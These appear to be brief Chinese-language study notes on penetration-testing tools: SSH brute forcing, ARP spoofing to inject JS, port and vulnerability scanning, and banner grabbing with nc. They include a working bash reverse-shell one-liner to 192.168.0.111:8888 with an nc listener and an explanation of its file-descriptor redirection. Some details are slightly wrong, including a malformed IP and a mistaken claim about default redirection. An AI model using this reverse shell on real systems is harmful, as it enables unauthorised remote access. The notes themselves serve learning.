SSH暴力破解 Medusa, hydra
内网arp欺骗 推送 JS脚本
扫描端口nmap, MESSCAN, zmap
漏洞扫描 BBSCAN
HIDS OSSEC
BANNER 检查 nc nc -nv 127.0.0.01 3306
reverse shell
本机 nc -l 8888
目标 bash -c 'bash -i >&/dev/tcp/192.168.0.111/8888 0>&1'
顺便说一下
0 1 2 是文件描述符
0 输入
1 标准输出
2 错误输出
2>&1 的意思是 前面的重定向时 要把错误输出也转到标准输出中, 因为默认只会重定向标准输入
而这里用到的 0>&1 表示 把输入重定向到标准输出中,从而实现reverse shell
而 > 后面紧跟着的& 用来表示后面的是文件描述符 而不是文件名字。
